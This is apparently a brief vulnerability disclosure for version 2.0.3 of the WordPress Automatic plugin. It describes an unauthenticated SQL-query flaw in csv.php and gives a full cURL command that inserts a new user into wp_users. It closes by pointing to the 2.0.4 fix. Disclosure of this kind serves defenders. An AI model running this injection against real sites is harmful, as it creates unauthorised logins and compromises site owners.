WordPress Automatic 2.0.3 Cross Site Request Forgery
Wordpress Automatic Plugin v2.0.3 CSRF Exploit
Wordpress automatic plugin posts quality targeted articles, Amazon Products, clickbank Products, Youtube Videos and feeds posts on auto-pilot. just install and leave, it will work 24/7* to blog for you .
The vulnerability occurs in the csv.php file which does not require valid login credentials and can be used to execute SQL Queries
Using this cURL command a user can send this POST data which will create a new login:
$ curl --data q=INSERT INTO `wp_users` (`user_login`, `user_pass`, `user_email`) VALUES ('test', '123456', 'firstname.lastname@example.org') http://www.example.com/blog/wp-content/plugins/wp-automatic/inc/csv.php
The author of this plugin has released a fix for this vulnerability and users are urged to upgrade to v2.0.4.